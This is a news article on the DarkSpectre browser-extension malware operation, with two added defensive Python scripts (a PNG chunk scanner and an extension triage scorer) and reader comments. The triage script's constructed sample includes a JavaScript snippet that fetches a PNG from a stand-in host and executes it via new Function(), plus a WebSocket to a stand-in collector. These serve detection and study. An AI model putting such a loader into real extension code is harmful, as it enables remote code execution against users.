DarkSpectre quietly infected millions through seemingly legit browser extensions

Alfonso Maruccia

In a nutshell: Cybersecurity researchers at Koi recently uncovered DarkSpectre, a Chinese operation linking multiple malicious campaigns through browser extensions. Hundreds of seemingly legitimate add-ons were downloaded by more than 8.8 million users, leaving them vulnerable to security issues over the seven-year lifespan of the operation.

The researchers initially discovered DarkSpectre while investigating ShadyPanda, a campaign based on popular Chrome and Edge extensions that infected over four million devices. Further analysis revealed that ShadyPanda was just one part of a three-pronged operation, each campaign following similar methods and malicious objectives.

The infrastructure tied to ShadyPanda led researchers to other campaigns, which used the same hidden domains. These domains, in turn, were connected to additional extensions available across multiple browser marketplaces, including Firefox, Edge, and Chrome.

DarkSpectre consists of three primary campaigns: The Zoom Stealer, which infected 2.2 million users across Firefox, Chrome, and Edge; ShadyPanda, affecting 5.6 million users on the same browsers; and GhostPoster, impacting 1.05 million Firefox instances. At first glance, the extensions appeared legitimate, making it easy for users to install them on their devices without suspicion.

The threat was designed to activate at a later date, with Chinese hackers delivering the actual malicious payload from a command-and-control server through hidden JavaScript code. The three campaigns, however, reportedly targeted different types of users.

According to Koi, ShadyPanda was created for large-scale surveillance and affiliate fraud. The related extensions remained active for several years before the hackers "weaponized" them through time-delayed activation and remote code injection.

The Trojan Image campaign embedded a stealthy payload inside a PNG icon file using steganography. The extensions would load the image, extract the hidden JavaScript, and execute the payload after a 48-hour delay.
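The PNG-carrier technique described above is something a defender can check for statically: a PNG is a fixed eight-byte signature followed by length-prefixed chunks that end with IEND, so a script appended after the image data, a tampered chunk, or an oversized text chunk stands out in a plain icon. The following Python triage check is an added example, not Koi's tooling or code from any of the extensions; the chunk-size threshold and the sample icon it builds for itself are constructed assumptions. It will not catch a payload encoded into the pixel values themselves, which has to be traced through the extension's own decoding code instead.

```python
"""Triage check for PNG files shipped inside a browser extension: walk the
chunk structure and report anything that does not belong in a plain icon
(bytes appended after IEND, CRC mismatches, unusually large text or private
chunks). Added example with constructed inputs; not Koi's tooling."""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunk types a normal icon is expected to contain; anything else is inspected.
EXPECTED_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"gAMA",
                   b"sRGB", b"pHYs", b"bKGD", b"cHRM", b"iCCP"}
# Assumption: non-image chunks larger than this deserve a closer look.
SUSPICIOUS_CHUNK_BYTES = 256


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: big-endian length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def scan_png(blob: bytes) -> dict:
    """Return the chunk inventory, any trailing bytes, and a list of findings."""
    findings = []
    if not blob.startswith(PNG_SIGNATURE):
        return {"chunks": [], "trailer": b"", "findings": ["not a PNG"]}
    pos = len(PNG_SIGNATURE)
    chunks = []
    saw_iend = False
    while pos + 8 <= len(blob) and not saw_iend:
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc_bytes = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc_bytes) < 4:
            findings.append(f"truncated chunk {ctype!r}")
            break
        expected = zlib.crc32(ctype + data) & 0xFFFFFFFF
        if struct.unpack(">I", crc_bytes)[0] != expected:
            findings.append(f"CRC mismatch in {ctype!r}")
        chunks.append((ctype, length))
        if ctype not in EXPECTED_CHUNKS and length > SUSPICIOUS_CHUNK_BYTES:
            findings.append(f"large non-image chunk {ctype!r} ({length} bytes)")
        saw_iend = ctype == b"IEND"
        pos += 12 + length
    # Decoders stop at IEND, so anything after it is invisible to the viewer
    # but fully available to a script that reads the file as text.
    trailer = blob[pos:] if saw_iend else b""
    if trailer:
        findings.append(f"{len(trailer)} bytes after IEND")
    if not saw_iend:
        findings.append("no IEND chunk")
    return {"chunks": chunks, "trailer": trailer, "findings": findings}


def build_icon(trailer: bytes = b"", extra_chunks=()) -> bytes:
    """Construct a minimal 1x1 PNG; optionally add chunks or trailing bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\xff\xff\xff")  # filter byte + one white pixel
    body = PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
    for ctype, data in extra_chunks:
        body += _chunk(ctype, data)
    body += _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    return body + trailer


if __name__ == "__main__":
    clean = build_icon()
    # Constructed sample: a script fragment stored after the image data.
    stuffed = build_icon(trailer=b"/*constructed marker*/ function run(){}")
    for name, blob in (("clean", clean), ("stuffed", stuffed)):
        print(name, scan_png(blob)["findings"])
```

Run it against every image in an unpacked extension directory and treat any non-empty findings list as a reason to read the scripts that load that file; an icon that is fetched with fetch() and then read as text rather than drawn is the companion signal.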

Here are some of the browser extensions abused by the DarkSpectre threat actor:

  • Chrome Audio Capture
  • ZED: Zoom Easy Downloader
  • X (Twitter) Video Downloader
  • Google Meet Auto Admit
  • Zoom.us Always Show "Join From Web"
  • Timer for Google Meet
  • CVR: Chrome Video Recorder
  • GoToWebinar & GoToMeeting Download Recordings
  • Meet Auto Admit
  • Google Meet Tweak (Emojis, Text, Cam Effects)
  • Mute All on Meet
  • Google Meet Push-To-Talk
  • Photo Downloader for Facebook, Instagram
  • Zoomcoder Extension
  • Auto-join for Google Meet
  • Edge Audio Capture (Edge)
  • Twitter X Video Downloader (Firefox)
  • New Tab – Customized Dashboard (Edge)
  • "Google Translate" by charliesmithbons

Zoom Stealer targeted corporate meeting intelligence, allegedly supporting more than 28 video conferencing platforms. Using WebSocket-based real-time data exfiltration, the hackers reportedly gained access to meeting links, credentials, dossiers, and other sensitive corporate information.
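The dormancy-then-remote-code pattern described earlier (time-delayed activation, hidden JavaScript pulled from a C2 server, a payload read out of an image file) and the WebSocket channel mentioned here all leave marks in an extension's manifest and scripts that can be scored before installation. The following Python script is an added example, not Koi's detection logic or code from the campaigns: it grades an unpacked extension with regex indicators, and the dormancy threshold, the weights, and the sample manifest and scripts are all constructed assumptions. Honest extensions also use alarms and WebSockets, so the score is a triage priority, not a verdict.

```python
"""Static triage of an unpacked browser extension: score the manifest and
each script for the behaviours the DarkSpectre write-up describes (long
dormancy timers, runtime code evaluation, remote code fetches, image files
read as text, WebSocket channels, broad host access).
Added example with constructed heuristics and samples; not Koi's tooling."""
import json
import re

# Each indicator: label, regex over the script text, weight (all assumptions).
SCRIPT_INDICATORS = [
    ("dynamic_eval", re.compile(r"\b(eval|Function)\s*\("), 3),
    ("websocket", re.compile(r"new\s+WebSocket\s*\("), 2),
    ("remote_fetch", re.compile(r"\bfetch\s*\(\s*[\"']https?://"), 1),
    # An image URL whose response is consumed with .text() instead of drawn.
    ("image_as_text", re.compile(r"\.png[\"'][^;]*\.text\s*\("), 2),
]
# Assumption: an alarm scheduled a day or more out is treated as dormancy.
DORMANCY_MINUTES = 24 * 60
ALARM_RE = re.compile(r"delayInMinutes\s*:\s*(\d+)")
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def scan_script(text: str) -> list:
    """Return (label, weight) hits for one script body."""
    hits = [(label, weight) for label, pattern, weight in SCRIPT_INDICATORS
            if pattern.search(text)]
    for m in ALARM_RE.finditer(text):
        minutes = int(m.group(1))
        if minutes >= DORMANCY_MINUTES:
            hits.append((f"dormant_alarm_{minutes}m", 3))
    return hits


def scan_manifest(manifest: dict) -> list:
    """Flag host access wide enough to reach every site plus alarm scheduling."""
    hits = []
    permissions = manifest.get("permissions", [])
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in permissions if "://" in p or p == "<all_urls>"}
    if hosts & BROAD_HOSTS:
        hits.append(("broad_host_access", 2))
    if "alarms" in permissions:
        hits.append(("alarms_permission", 1))
    return hits


def triage(manifest: dict, scripts: dict) -> dict:
    """Aggregate per-file indicators and a total risk score for the package."""
    findings = {"manifest": scan_manifest(manifest)}
    for name, text in scripts.items():
        findings[name] = scan_script(text)
    score = sum(weight for hits in findings.values() for _, weight in hits)
    return {"score": score, "findings": findings}


# Constructed sample package: a dormant background worker, a WebSocket client,
# and an ordinary popup script, with a manifest granting access to all sites.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "Meeting Helper (constructed sample)",
    "permissions": ["alarms", "storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
}
SAMPLE_SCRIPTS = {
    "bg.js": (
        "// constructed sample resembling the dormancy pattern in the write-up\n"
        'chrome.alarms.create("refresh", { delayInMinutes: 2880 });\n'
        "chrome.alarms.onAlarm.addListener(async () => {\n"
        '  const txt = await (await fetch("https://cdn.example.invalid/icon.png")).text();\n'
        "  new Function(txt)();\n"
        "});\n"
    ),
    "content.js": (
        "const ws = new WebSocket('wss://collector.example.invalid/s');\n"
        'ws.onopen = () => ws.send("hello");\n'
    ),
    "popup.js": (
        "document.getElementById('go').onclick = "
        "() => chrome.runtime.sendMessage({ cmd: 'start' });\n"
    ),
}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MANIFEST, SAMPLE_SCRIPTS), indent=2))
```

The per-file breakdown matters more than the total: a single script that combines a long alarm, a fetch of an image URL read as text, and Function() is the combination the article describes, whereas the same indicators spread thinly across unrelated files are usually benign.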

The DarkSpectre operation likely points to a well-resourced Chinese state-sponsored group. This actor consistently hosts C2 servers on Alibaba Cloud, leverages China-based internet content providers, and includes Chinese-language strings throughout the codebase.

"The combination of patience, scale, technical sophistication, and operational diversity points to an adversary with substantial resources and long-term strategic goals," the analysts concluded.

This whole mess with infested extensions reminds me of the widgets in Windows 7, which had the same problem if I remember correctly. Eventually, Microsoft just removed them entirely because they couldn't guarantee their safety.
 
Huh, I still remember the day when most websites stopped using Macromedia Flash and JavaScript because each of them was a security risk.

The internet is never a safe place, especially with internet getting really cheap. 20 years ago, before 3G was even launched, the internet wasn't this cheap. Things were slow, so people had to really optimize things.

 
This whole mess with infested extensions reminds me of the widgets in Windows 7, which had the same problem if I remember correctly. Eventually, Microsoft just removed them entirely because they couldn't guarantee their safety.
Ironically, one such widget was once able to detect a CPU crypto miner. The crypto miner was smart. It paused all processes once the user opened Task Manager. Thus everything seemed normal.

It then started up as soon as the user closed the Task Manager. They also had the same logic for several third-party process managers like Process Explorer, etc.

But they failed to account for a small thread watcher I had running in my sidebar, and this clearly showed how a single core was constantly utilized to 100%.

And while the sidebar gadgets themselves are not very secure, they are very useful and lightweight. Several popular programs still include their own even in Windows 11, like AIDA64 for example.

More here: https://gadgetpack.net